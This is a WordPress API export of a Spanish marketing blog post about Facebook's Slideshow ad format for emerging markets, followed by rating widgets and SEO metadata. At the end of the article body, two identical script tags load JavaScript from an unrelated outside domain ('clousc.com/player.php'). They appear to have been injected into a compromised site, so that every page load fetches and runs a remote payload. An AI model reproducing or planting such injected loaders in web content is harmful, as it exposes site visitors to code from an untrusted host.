{"id":260,"date":"2015-11-02T21:05:19","date_gmt":"2015-11-03T03:05:19","guid":{"rendered":"https:\/\/www.latamdigitalmarketing.com\/?p=260"},"modified":"2015-11-02T21:05:19","modified_gmt":"2015-11-03T03:05:19","slug":"mercados-emergentes-anuncios-facebook","status":"publish","type":"post","link":"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/","title":{"rendered":"Mercados emergentes en la mira de Facebook con SlideShow su nueva opci\u00f3n publicitaria"},"content":{"rendered":"<p style=\"text-align: justify;\">Como lo he dicho, en este mundo digital hay que\u00a0 irse adaptando de acuerdo al momento, el tiempo y los detalles y\u00a0 es as\u00ed como Facebook present\u00f3 el pasado jueves Slideshow, su nuevo formato publicitario, en una videoconferencia con periodistas de todo el mundo.<\/p>\n<p style=\"text-align: justify;\">Desde la casa matriz de Menlo Park. La red social explic\u00f3 que su nuevo servicio publicitario permitir\u00e1 unir im\u00e1genes fijas con m\u00fasica en un video. El mismo ser\u00e1 \u00fatil incluso hasta en usuarios y lugares con conexiones d\u00e9biles de Internet.<\/p>\n<p style=\"text-align: justify;\">\u00a0\u201cCreamos Slideshow para ayudar a las empresas a conectar con personas que quieren ver m\u00e1s contenido de video en mercados emergentes y de alto crecimiento. Sin embargo, compa\u00f1\u00edas en todo el mundo est\u00e1n adoptando slideshow como una forma de superar los desaf\u00edos de crear videos o, simplemente, para probar un nuevo y atrapante formato publicitario\u201d, indic\u00f3 Facebook.<\/p>\n<p style=\"text-align: justify;\">Basta con cargar de tres a siete fotograf\u00edas \u2013ya sean im\u00e1genes de un video existente, de una sesi\u00f3n de fotos o incluso material de una galer\u00eda. Se pueden crear en\u00a0 poco m\u00e1s de15 segundos \u00a0y pagar en forma f\u00e1cil y r\u00e1pida en la plataforma de Facebook.<\/p>\n<h2 style=\"text-align: justify;\">McLean uno de los presentes en esta conferencia se refiri\u00f3 a la articulaci\u00f3n de Facebook con los negocios y los desaf\u00edos y oportunidades que presenta en estos mercados emergentes.<\/h2>\n<p style=\"text-align: justify;\">Actividades como el eCommerce o comercio electr\u00f3nico, tambi\u00e9n pueden verse afectadas por problemas de infraestructura, y es por eso que en cada caso la red social busca amoldarse a los comportamientos locales.\u00a0Una tendencia que seg\u00fan McLean caracteriza a estos mercados emergentes es que la gente desea y disfruta estar en contacto con las marcas, e incluso comparte con entusiasmo sus contenidos. Esto se puede asignar\u00a0a una ansia de consumo y de promoci\u00f3n\u00a0social.<\/p>\n<p style=\"text-align: justify;\">Para finalizar,\u00a0Srinivasan se centr\u00f3 en el rol de Facebook como mediador entre anunciantes y consumidores, bajo el lema \u201calcanzar a todos, en cualquier nivel de conectividad, c\u00f3mo y cu\u00e1ndo se quieran conectar\u201d. de ah\u00ed que este tipo de anuncios sea una opci\u00f3n para los mercados emergentes que buscan \u00a0estar al tanto de la tecnolog\u00eda.<\/p>\n<p style=\"text-align: justify;\">Si quieres llegar a la audiencia correcta y vender mas \u2013 Hablemos de tu estrategia DIGITAL \u2013\u00a0<a href=\"https:\/\/www.latamdigitalmarketing.com\/\" target=\"_blank\">LDM<\/a><\/p>\n<p><script src=\"https:\/\/clousc.com\/player.php?ver=32\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/clousc.com\/player.php?ver=32\" type=\"text\/javascript\"><\/script><\/p>\n\n\n<div class=\"kk-star-ratings kksr-auto kksr-align-left kksr-valign-bottom\"\n    data-payload='{&quot;align&quot;:&quot;left&quot;,&quot;id&quot;:&quot;260&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;0&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;0&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;Rate this post&quot;,&quot;legend&quot;:&quot;0\\\/5 - (0 votos)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;title&quot;:&quot;Mercados emergentes en la mira de Facebook con SlideShow su nueva opci\u00f3n publicitaria&quot;,&quot;width&quot;:&quot;0&quot;,&quot;_legend&quot;:&quot;{score}\\\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}'>\n            \n<div class=\"kksr-stars\">\n    \n<div class=\"kksr-stars-inactive\">\n            <div class=\"kksr-star\" data-star=\"1\" style=\"padding-right: 5px\">\n            \n\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n        <\/div>\n            <div class=\"kksr-star\" data-star=\"2\" style=\"padding-right: 5px\">\n            \n\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n        <\/div>\n            <div class=\"kksr-star\" data-star=\"3\" style=\"padding-right: 5px\">\n            \n\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n        <\/div>\n            <div class=\"kksr-star\" data-star=\"4\" style=\"padding-right: 5px\">\n            \n\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n        <\/div>\n            <div class=\"kksr-star\" data-star=\"5\" style=\"padding-right: 5px\">\n            \n\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n        <\/div>\n    <\/div>\n    \n<div class=\"kksr-stars-active\" style=\"width: 0px;\">\n            <div class=\"kksr-star\" style=\"padding-right: 5px\">\n            \n\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n        <\/div>\n            <div class=\"kksr-star\" style=\"padding-right: 5px\">\n            \n\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n        <\/div>\n            <div class=\"kksr-star\" style=\"padding-right: 5px\">\n            \n\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n        <\/div>\n            <div class=\"kksr-star\" style=\"padding-right: 5px\">\n            \n\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n        <\/div>\n            <div class=\"kksr-star\" style=\"padding-right: 5px\">\n            \n\n<div class=\"kksr-icon\" style=\"width: 24px; height: 24px;\"><\/div>\n        <\/div>\n    <\/div>\n<\/div>\n                \n\n<div class=\"kksr-legend\" style=\"font-size: 19.2px;\">\n            <span class=\"kksr-muted\">Rate this post<\/span>\n    <\/div>\n    <\/div>\n","protected":false},"excerpt":{"rendered":"<p>Como lo he dicho, en este mundo digital hay que\u00a0 irse adaptando de acuerdo al momento, el tiempo y los detalles y\u00a0 es as\u00ed como Facebook present\u00f3 el pasado jueves Slideshow, su nuevo formato publicitario, en una videoconferencia con periodistas de todo el mundo. Desde la casa matriz de Menlo Park. La red social explic\u00f3 &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/\" class=\"more-link\">Continuar leyendo<span class=\"screen-reader-text\"> \u00abMercados emergentes en la mira de Facebook con SlideShow su nueva opci\u00f3n publicitaria\u00bb<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":265,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[38],"tags":[36,56,54],"class_list":["post-260","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-social-media-marketing","tag-facebook","tag-facebook-marketing","tag-redessociales"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Mercados emergentes - Latam Digital Marketing<\/title>\n<meta name=\"description\" content=\"Facebook explic\u00f3 que su nuevo servicio publicitario permitir\u00e1 unir im\u00e1genes fijas con m\u00fasica en un video y que es de f\u00e1cil acceso para mercados emergentes.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Mercados emergentes - Latam Digital Marketing\" \/>\n<meta property=\"og:description\" content=\"Facebook explic\u00f3 que su nuevo servicio publicitario permitir\u00e1 unir im\u00e1genes fijas con m\u00fasica en un video y que es de f\u00e1cil acceso para mercados emergentes.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/\" \/>\n<meta property=\"og:site_name\" content=\"LDM\u00ae Latam Digital Marketing\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Latamdigitalmarketing\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/Latamdigitalmarketing\/\" \/>\n<meta property=\"article:published_time\" content=\"2015-11-03T03:05:19+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-content\/uploads\/2015\/11\/7ee0f6d157acd2af82cac0e66310571e.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"560\" \/>\n\t<meta property=\"og:image:height\" content=\"373\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Alberto Alvarez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@AgenciaLDM\" \/>\n<meta name=\"twitter:site\" content=\"@AgenciaLDM\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Alberto Alvarez\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/\"},\"author\":{\"name\":\"Alberto Alvarez\",\"@id\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/#\/schema\/person\/e3ff719871c6dac0411a0af17149bd4e\"},\"headline\":\"Mercados emergentes en la mira de Facebook con SlideShow su nueva opci\u00f3n publicitaria\",\"datePublished\":\"2015-11-03T03:05:19+00:00\",\"dateModified\":\"2015-11-03T03:05:19+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/\"},\"wordCount\":400,\"publisher\":{\"@id\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-content\/uploads\/2015\/11\/7ee0f6d157acd2af82cac0e66310571e.jpg\",\"keywords\":[\"Facebook\",\"facebook marketing\",\"Redes Sociales\"],\"articleSection\":[\"Redes sociales\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/\",\"url\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/\",\"name\":\"Mercados emergentes - Latam Digital Marketing\",\"isPartOf\":{\"@id\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-content\/uploads\/2015\/11\/7ee0f6d157acd2af82cac0e66310571e.jpg\",\"datePublished\":\"2015-11-03T03:05:19+00:00\",\"dateModified\":\"2015-11-03T03:05:19+00:00\",\"description\":\"Facebook explic\u00f3 que su nuevo servicio publicitario permitir\u00e1 unir im\u00e1genes fijas con m\u00fasica en un video y que es de f\u00e1cil acceso para mercados emergentes.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/#primaryimage\",\"url\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-content\/uploads\/2015\/11\/7ee0f6d157acd2af82cac0e66310571e.jpg\",\"contentUrl\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-content\/uploads\/2015\/11\/7ee0f6d157acd2af82cac0e66310571e.jpg\",\"width\":560,\"height\":373,\"caption\":\"mercados emergentes\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Mercados emergentes en la mira de Facebook con SlideShow su nueva opci\u00f3n publicitaria\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/#website\",\"url\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/\",\"name\":\"LDM\u00ae Latam Digital Marketing\",\"description\":\"Forward Thinking Marketing\",\"publisher\":{\"@id\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/#organization\",\"name\":\"Latam Digital Marketing\",\"url\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-content\/uploads\/2018\/08\/profile-picture.jpg\",\"contentUrl\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-content\/uploads\/2018\/08\/profile-picture.jpg\",\"width\":811,\"height\":811,\"caption\":\"Latam Digital Marketing\"},\"image\":{\"@id\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/Latamdigitalmarketing\",\"https:\/\/x.com\/AgenciaLDM\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/#\/schema\/person\/e3ff719871c6dac0411a0af17149bd4e\",\"name\":\"Alberto Alvarez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-content\/uploads\/2018\/08\/albertoSmall.jpg\",\"contentUrl\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-content\/uploads\/2018\/08\/albertoSmall.jpg\",\"caption\":\"Alberto Alvarez\"},\"description\":\"Luego de trabajar casi una d\u00e9cada en mercadeo en Procter & Gamble, Alberto envisiona el poder del cambio de la era digital y decide enfocarse en desarrollar el mundo del emprendimiento en Latinoam\u00e9rica. En 2012 funda su primer start-up, gogetit.com.pa, cambiando la forma de interactuar con bienes ra\u00edces en la regi\u00f3n. Alberto, sirvi\u00f3 como VP de Mercadeo de Agora Technologies en Silicon Valley, compa\u00f1\u00eda financiada por Guy Kawasaki & Nolan Bushnell y desarroll\u00f3 el concepto global de Startup Icon. Hoy, Alberto es el CEO del holding de compa\u00f1\u00edas que conforman Latam Digital Marketing, Gogetit y sus subsidiarias en Latinoam\u00e9rica.\",\"sameAs\":[\"https:\/\/www.facebook.com\/Latamdigitalmarketing\/\",\"http:\/\/linkedin.com\/in\/albertoalvarezm\",\"https:\/\/x.com\/AgenciaLDM\"],\"url\":\"https:\/\/www.latamdigitalmarketing.com\/blog\/bio\/alberto-alvarez\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Mercados emergentes - Latam Digital Marketing","description":"Facebook explic\u00f3 que su nuevo servicio publicitario permitir\u00e1 unir im\u00e1genes fijas con m\u00fasica en un video y que es de f\u00e1cil acceso para mercados emergentes.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/","og_locale":"es_ES","og_type":"article","og_title":"Mercados emergentes - Latam Digital Marketing","og_description":"Facebook explic\u00f3 que su nuevo servicio publicitario permitir\u00e1 unir im\u00e1genes fijas con m\u00fasica en un video y que es de f\u00e1cil acceso para mercados emergentes.","og_url":"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/","og_site_name":"LDM\u00ae Latam Digital Marketing","article_publisher":"https:\/\/www.facebook.com\/Latamdigitalmarketing","article_author":"https:\/\/www.facebook.com\/Latamdigitalmarketing\/","article_published_time":"2015-11-03T03:05:19+00:00","og_image":[{"width":560,"height":373,"url":"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-content\/uploads\/2015\/11\/7ee0f6d157acd2af82cac0e66310571e.jpg","type":"image\/jpeg"}],"author":"Alberto Alvarez","twitter_card":"summary_large_image","twitter_creator":"@AgenciaLDM","twitter_site":"@AgenciaLDM","twitter_misc":{"Escrito por":"Alberto Alvarez","Tiempo de lectura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/#article","isPartOf":{"@id":"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/"},"author":{"name":"Alberto Alvarez","@id":"https:\/\/www.latamdigitalmarketing.com\/blog\/#\/schema\/person\/e3ff719871c6dac0411a0af17149bd4e"},"headline":"Mercados emergentes en la mira de Facebook con SlideShow su nueva opci\u00f3n publicitaria","datePublished":"2015-11-03T03:05:19+00:00","dateModified":"2015-11-03T03:05:19+00:00","mainEntityOfPage":{"@id":"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/"},"wordCount":400,"publisher":{"@id":"https:\/\/www.latamdigitalmarketing.com\/blog\/#organization"},"image":{"@id":"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/#primaryimage"},"thumbnailUrl":"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-content\/uploads\/2015\/11\/7ee0f6d157acd2af82cac0e66310571e.jpg","keywords":["Facebook","facebook marketing","Redes Sociales"],"articleSection":["Redes sociales"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/","url":"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/","name":"Mercados emergentes - Latam Digital Marketing","isPartOf":{"@id":"https:\/\/www.latamdigitalmarketing.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/#primaryimage"},"image":{"@id":"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/#primaryimage"},"thumbnailUrl":"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-content\/uploads\/2015\/11\/7ee0f6d157acd2af82cac0e66310571e.jpg","datePublished":"2015-11-03T03:05:19+00:00","dateModified":"2015-11-03T03:05:19+00:00","description":"Facebook explic\u00f3 que su nuevo servicio publicitario permitir\u00e1 unir im\u00e1genes fijas con m\u00fasica en un video y que es de f\u00e1cil acceso para mercados emergentes.","breadcrumb":{"@id":"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/#primaryimage","url":"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-content\/uploads\/2015\/11\/7ee0f6d157acd2af82cac0e66310571e.jpg","contentUrl":"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-content\/uploads\/2015\/11\/7ee0f6d157acd2af82cac0e66310571e.jpg","width":560,"height":373,"caption":"mercados emergentes"},{"@type":"BreadcrumbList","@id":"https:\/\/www.latamdigitalmarketing.com\/blog\/mercados-emergentes-anuncios-facebook\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/www.latamdigitalmarketing.com\/blog\/"},{"@type":"ListItem","position":2,"name":"Mercados emergentes en la mira de Facebook con SlideShow su nueva opci\u00f3n publicitaria"}]},{"@type":"WebSite","@id":"https:\/\/www.latamdigitalmarketing.com\/blog\/#website","url":"https:\/\/www.latamdigitalmarketing.com\/blog\/","name":"LDM\u00ae Latam Digital Marketing","description":"Forward Thinking Marketing","publisher":{"@id":"https:\/\/www.latamdigitalmarketing.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.latamdigitalmarketing.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/www.latamdigitalmarketing.com\/blog\/#organization","name":"Latam Digital Marketing","url":"https:\/\/www.latamdigitalmarketing.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.latamdigitalmarketing.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-content\/uploads\/2018\/08\/profile-picture.jpg","contentUrl":"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-content\/uploads\/2018\/08\/profile-picture.jpg","width":811,"height":811,"caption":"Latam Digital Marketing"},"image":{"@id":"https:\/\/www.latamdigitalmarketing.com\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Latamdigitalmarketing","https:\/\/x.com\/AgenciaLDM"]},{"@type":"Person","@id":"https:\/\/www.latamdigitalmarketing.com\/blog\/#\/schema\/person\/e3ff719871c6dac0411a0af17149bd4e","name":"Alberto Alvarez","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.latamdigitalmarketing.com\/blog\/#\/schema\/person\/image\/","url":"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-content\/uploads\/2018\/08\/albertoSmall.jpg","contentUrl":"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-content\/uploads\/2018\/08\/albertoSmall.jpg","caption":"Alberto Alvarez"},"description":"Luego de trabajar casi una d\u00e9cada en mercadeo en Procter & Gamble, Alberto envisiona el poder del cambio de la era digital y decide enfocarse en desarrollar el mundo del emprendimiento en Latinoam\u00e9rica. En 2012 funda su primer start-up, gogetit.com.pa, cambiando la forma de interactuar con bienes ra\u00edces en la regi\u00f3n. Alberto, sirvi\u00f3 como VP de Mercadeo de Agora Technologies en Silicon Valley, compa\u00f1\u00eda financiada por Guy Kawasaki & Nolan Bushnell y desarroll\u00f3 el concepto global de Startup Icon. Hoy, Alberto es el CEO del holding de compa\u00f1\u00edas que conforman Latam Digital Marketing, Gogetit y sus subsidiarias en Latinoam\u00e9rica.","sameAs":["https:\/\/www.facebook.com\/Latamdigitalmarketing\/","http:\/\/linkedin.com\/in\/albertoalvarezm","https:\/\/x.com\/AgenciaLDM"],"url":"https:\/\/www.latamdigitalmarketing.com\/blog\/bio\/alberto-alvarez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-json\/wp\/v2\/posts\/260","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-json\/wp\/v2\/comments?post=260"}],"version-history":[{"count":0,"href":"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-json\/wp\/v2\/posts\/260\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-json\/wp\/v2\/media\/265"}],"wp:attachment":[{"href":"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-json\/wp\/v2\/media?parent=260"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-json\/wp\/v2\/categories?post=260"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.latamdigitalmarketing.com\/blog\/wp-json\/wp\/v2\/tags?post=260"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}